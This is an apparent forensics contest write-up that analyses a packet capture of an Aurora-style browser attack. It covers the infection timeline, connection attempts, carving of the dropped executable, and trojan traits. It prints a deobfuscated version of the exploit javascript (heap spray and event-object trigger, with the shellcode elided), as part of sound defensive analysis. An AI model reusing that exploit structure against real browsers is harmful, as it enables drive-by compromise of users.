Name: Candice Quates
Description: The analysis so far, Puzzle #6, Ann DerCover and Vick Timmes.

Contents:
0. Introduction and tools
1. Packet capture major event timeline
2. Questions answered by looking at pcap in Wireshark
3. Questions answered by extracting files
3a. The file of javascript
3b. Getting the executable / writing a carver
4. So, what really happened? Where is the C&C?

0. Introduction and tools

So we have an Aurora puzzle here. There is a bit of mystery as to how these attacks actually work; is Ann waiting on the other end controlling Vick's every move, or is it all programmed in to the exploit and trojan horse programs? Amidst this we have been asked to come up with answers to several packet-based questions, and some file-based ones. How far down the rabbit hole of javascript and exploit analysis should we go?

Tools. Tools are fun. I used primarily wireshark on ubuntu for the plain packet analysis, and NetworkMiner in a Windows XP vmware instance to extract the initial HTTP infection, as well as for a nice overview of sessions. I used my own hastily written carver to extract the exe files from the "follow tcp stream, save as" dumps in wireshark, and checked my results of that against foremost. The free linux hex editor 'hte' (hte.sourceforge.net) can parse the PE header data and disassemble without needing to boot into a vm to use a nice windows hex editor. It's a little shaky for actual editing, though.

As I mentioned rabbit holes, until this puzzle I had only passing knowledge of the javascript exploit vector, and I spent quite a bit of time reading up on it. Something also possessed me to write a carver in the middle of the night, but I have wanted to make one of those to use as a basis for other code for some time.

1.
Packet capture major event timeline

Packet#  Time(s)  Event description
-------------------------------------------------------------
1        0.0      Vick clicks link http://10.10.10.10:8080/index.php
9        0.46     .gif file in iframe of index.php is requested
13       1.3      TCP session from vick to port 4444 begins
17       1.52     Packet containing start of EXE file on port 4444 arrives
1153     35.95    Connection attempts to port 4445 begin (and fail)
1562     87.6     Connection on port 4444 starts to close
1565     87.6     Port 4444 finishes closing
1652     122.7    Start of successful port 4445 connection
1656     123.6    Successful connection handshake done on port 4445
1660     123.9    EXE file download from port 4445 begins
2552     198.4    Connection on port 4445 starts to close
2554     198.4    Port 4445 finishes closing. Capture ends

2. Questions answered by looking at pcap in Wireshark

All of the above table data was found using wireshark. I also plugged this pcap file into NetworkMiner, and found that NetworkMiner seemed to ignore all the failed connection attempts. Maybe I missed something, but that struck me as odd.

I pieced the table above together from my notes answering all of the different questions, as I had the packet numbers and times all scribbled down on paper. I took notes and kept them ordered by date, and cleaned them up later, adding some missing times and double-checking their locations.

One packet related question which was a little tedious was question #7. I had to go figure out where in the wireshark settings you turn off the automatic sequence number hiding (preferences->protocols->tcp). The sequence numbers changed every third packet of the failed connection attempts, except for the first attempt, where they changed on the fourth packet.

I found out how to add a custom field to show the ip.id field to my packet capture log, using the wonder of google and mailing lists.
For that, go into preferences, and make a new column with a custom type, and put 'ip.id' into the custom field. That made the id numbers come up very clearly, changing once per packet.

For the port number changes part of problem #7, I made a table on paper in notes which I'll reproduce here:

Packet   Time     Source port attempting to connect to 4445
-------------------------------------------------------------
1153     35.94    1037
1187     47.73    1038
1313     59.46    1039
1503     71.25    1040
1533     82.99    1041
1568     94.87    1042
1598     106.83   1043
1628     118.74   1044   <- success on this one, eventually

From this capture, the source port changes roughly every twelve seconds.

3. Questions answered by extracting files

3a. Javascript

The first two files were nice and encapsulated in HTTP requests, and NetworkMiner came up with them easily.

'index.php' is full of obfuscated javascript. It is pretty simple to use search and replace in a programming editor (I just used vi) to rename the long ugly variables into generic short things. That made the entire process of tracing easier to work with. Variables named 1,2,3,4 are easier than gibberish.
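The same renaming can also be scripted instead of done by hand in an editor. What follows is only a minimal sketch in Python, not what was actually used here (that was vi). The obfuscated names in `mapping` and `sample` are hypothetical, invented for the example, and the function name `rename_identifiers` is likewise an assumption.

```python
import re

def rename_identifiers(source, names):
    """Replace each obfuscated identifier in source with its short name."""
    # \b keeps the match to whole identifiers, so a name that happens to be
    # a substring of a longer identifier is left alone.
    alternatives = "|".join(re.escape(n) for n in names)
    pattern = re.compile(r"\b(" + alternatives + r")\b")
    return pattern.sub(lambda m: names[m.group(1)], source)

# Hypothetical obfuscated names, not taken from the real index.php.
sample = 'var qXzPlmW = "COMMENT"; var kJhGfd = new Array(); kJhGfd[0] = qXzPlmW;'
mapping = {"qXzPlmW": "var1", "kJhGfd": "var2"}

print(rename_identifiers(sample, mapping))
# prints: var var1 = "COMMENT"; var var2 = new Array(); var2[0] = var1;
```

Note that this is a plain text substitution: it would also rewrite a matching word inside a string literal, so the result still needs a quick read-through.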
(headers removed)
var var1 = "COMMENT";
var var2 = new Array();
for (i = 0; i < 1300; i++)
{
    var2[i] = document.createElement(var1);
    var2[i].data = "vEI";    // answer #2
}
var var3 = null;
var var4 = new Array();
var unescapefunc = unescape;
function func1()
{
    var var5 = unescapefunc( '%u.......huge block of shellcode
    var var6 = unescapefunc( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
    do { var6 += var6 } while( var6.length < 0xd0000 );
    for (PEf = 0; PEf < 150; PEf++) var4[PEf] = var6 + var5;
}
function func2(func2arg)
{
    func1();
    var3 = document.createEventObject(func2arg);
    document.getElementById("element").innerHTML = "";
    window.setInterval(func3, 50);
}
function func3()
{
    p = "\u0c0f\u0c0d...shellcode-looking stuff
    for (i = 0; i < var2.length; i++)
    {
        var2[i].data = p;
    }
    var t = var3.srcElement;
}
X/scriptX
X/headX
XbodyX
Xspan id="element"XXiframe src="/index.phpmfKSxSANkeTeNrah.gif" onload="func2(event)" /XX/spanXX/bodyXX/htmlX

At the end here, you can clearly see the URL of the gif file, which launches our function, and runs the exploit.

I'm not entirely clear how the giant block of shellcode does its magic, but I did extract it with spidermonkey and look at it. Deep analysis of javascript-based shellcode is not something I've done before, and after starting that I realized I might not finish the puzzle if I kept it up. It definitely got me started learning about how browser based attacks work, and I'll take a closer look at it later.

From what I can understand, the iframe loads the gif file, whose onload call runs func2(). That in turn runs func1() with its giant shellcode block, sets some stuff, and then sets up a 50 ms loop with window.setInterval to run func3() over and over again. I think that func1() contains the exploit (and maybe the port 4444 connection), and the loop running func3() may be the other connect-back attempts. The packet capture doesn't really help me figure this out.
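For anyone who wants to look at the bytes behind an unescape() string without a javascript engine, here is a minimal sketch in Python. It is not the spidermonkey route used above. It assumes the string holds only %uXXXX escapes and that each 16-bit unit is stored little-endian in memory, as on x86 Windows; anything else in the string is skipped. The function name `unescape_to_bytes` is made up for the example.

```python
import re
import struct

def unescape_to_bytes(escaped):
    """Turn %uXXXX escapes into the bytes they occupy in memory.

    Assumption: each escape is one 16-bit code unit stored little-endian.
    Text that is not a %uXXXX escape is ignored.
    """
    out = bytearray()
    for match in re.finditer(r"%u([0-9a-fA-F]{4})", escaped):
        out += struct.pack("<H", int(match.group(1), 16))
    return bytes(out)

# The value that var6 is built from in the listing above.
print(unescape_to_bytes("%u0c0d%u0c0d").hex())
# prints: 0d0c0d0c
```

Writing the result to a file gives something a hex editor or disassembler can open directly.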
As for the md5 of the .gif file:

df3e567d6f16d040326c7a0ea29a4f41  index.phpmfKSxSANkeTeNrah.gif

3b. Getting the executable freed

So, I found the two port 4444 and 4445 tcp executable streams pretty easily, and separated them out into server->client only in wireshark "follow tcp stream" and saved each. They both contain a bunch of junk before the MZ, and it's not immediately apparent how big the executables within are.

-rw-r--r-- 1  833133 2010-06-23 19:53 puzzle6-packet1656stream.raw
-rw-r--r-- 1 1239098 2010-06-23 19:52 puzzle6-packet17stream.raw

I opened one up in a hex editor (hte again) and deleted off the first few characters, closed it, and got into the PE header information, trying to figure out how to calculate the file size. I puzzled at it for a while, considering there is no raw image filesize field in the PE spec, and realized that the last section information is the key: the last entry of the section header table has the offset to the last file section and its size. Adding these two together would produce the filesize.

I went and pulled up the finished executable from forensics puzzle #5, fired up the editor and a hex calculator, dug down to the two values and there it was, the size.

Now, how to do that with a program? In my case, C and fseek. (Yes, I could have just used foremost, I know. But this only took a little over two hours late one evening, and it was fun.)

The program searched for MZ, then PE, and then consumed bytes to get their values and added offsets to get to the next part of information. I wrote the program step by step, testing its output against a PE file that did not need to be carved, so as to have a clear place to start. (Again, the puzzle #5 executable.)

Then I tried running it on both executables. I got the same file for both, plugged the md5 into virustotal and came up with nothing; then I looked at my extracted files a little more carefully and realized they were one byte too big.
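The size calculation described above can be sketched in a few lines. This is a Python illustration, not the C/fseek carver itself, and the function names `pe_file_size` and `carve_first_pe` are made up for it. One deliberate difference: rather than trusting the last section header entry, it takes the largest (raw offset + raw size) across all entries, which is the same number whenever sections are stored in file order. It also assumes nothing is appended after the last section.

```python
import struct

def pe_file_size(buf, mz):
    """Return the on-disk size of the PE file starting at offset mz, or None."""
    if buf[mz:mz + 2] != b"MZ" or mz + 0x40 > len(buf):
        return None
    # e_lfanew: offset of the "PE\0\0" signature, stored at 0x3C in the DOS header.
    (e_lfanew,) = struct.unpack_from("<I", buf, mz + 0x3C)
    pe = mz + e_lfanew
    if buf[pe:pe + 4] != b"PE\0\0" or pe + 24 > len(buf):
        return None
    # COFF header follows the signature: NumberOfSections at +6,
    # SizeOfOptionalHeader at +20 (both relative to the signature).
    (num_sections,) = struct.unpack_from("<H", buf, pe + 6)
    (opt_size,) = struct.unpack_from("<H", buf, pe + 20)
    table = pe + 24 + opt_size          # start of the section header table
    end = 0
    for i in range(num_sections):
        hdr = table + 40 * i            # each section header is 40 bytes
        if hdr + 40 > len(buf):
            return None
        # SizeOfRawData at +16, PointerToRawData at +20 within the entry.
        raw_size, raw_ptr = struct.unpack_from("<II", buf, hdr + 16)
        end = max(end, raw_ptr + raw_size)
    return end or None

def carve_first_pe(buf):
    """Return the bytes of the first plausible PE file in buf, or None."""
    mz = buf.find(b"MZ")
    while mz != -1:
        size = pe_file_size(buf, mz)
        if size is not None:
            return buf[mz:mz + size]
        mz = buf.find(b"MZ", mz + 1)
    return None
```

To use it, read one of the saved stream dumps in binary mode, pass the bytes to carve_first_pe(), and write the result out for hashing.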
I fixed the program to carve off on an even number of bytes (PE files always end on padded boundaries, I'm not sure it's possible to have one with an odd size), and it found something that looked like malware!

-rw------- 1 748032 2010-06-26 22:43 pefileL995r
b062cb8344cd3e296d8868fbef289c7c  pefileL995r
http://www.virustotal.com/analisis/14f489f20d7858d2e88fdfffb594a9e5f77f1333c7c479f6d3f1b48096d382fe-1276598794

Somewhere in this process I also decided to run foremost on the packet captures, and it came up with the same md5 as I have here.

At this point, having checked out the file well enough without really going into the nuts and bolts, I went on to try to finish up the puzzle and see why all of these different things happened, because there is a lot of unexplained extra traffic after these files are downloaded on the port 4444 and 4445 connections. If there is any time left before contest end I will sandbox this and get back to you guys.

4. So, what really happened? Where is the C&C?

To be honest? I'm not entirely sure. The traffic on the port 4444 connection after the PE file ends looks like gobbledygook. I did some unix tricks to split the end off (split -b) and used find in wireshark to locate the packet where the file ends, at about packet 607, which is well before the port 4445 connection attempts start.

There are a lot of imports and exports in the file we downloaded, which doesn't seem right for normal malware, but a lot of them are "connection" functions, probably for connecting into a botnet or something of that nature. I'm assuming Ann was planning more after she got the trojan to run on this machine.

Perhaps a quick behavioral analysis will get us some more leads? No, not really, at least in my sandbox setup. I fed the binary to it, and it just checked a bunch of stuff in the registry and exited.

I noticed though, that the binary doesn't really look packed at all, so I put it into IDApro (free) and started digging.
It's got some simple anti-debugger tricks at the dll entry point (SEH and a system call to "IsDebuggerPresent") and actually has imports and exports present, which is pretty weird, I thought. It looks like OpenSSL (0.9.8k) and Zlib are statically linked in, because the strings for their code are all in the resources section.

I started chasing malware-ish looking functions in the exports section back up through the code, and found possible evidence of a keylogger (ReadConsoleInputA) and of process memory modification (WriteProcessMemory), which is hooking other code to hide itself.

Looks like a trojan to me, but I have not found the source of the communications code; I found lots of create packet/receive packet/send packet sort of functions, but not anything to help me answer the question: why did the port 4445 download start?

From here I am out of time, and I hope you like my analysis, incomplete as it may be.

Candice Quates, June 2010.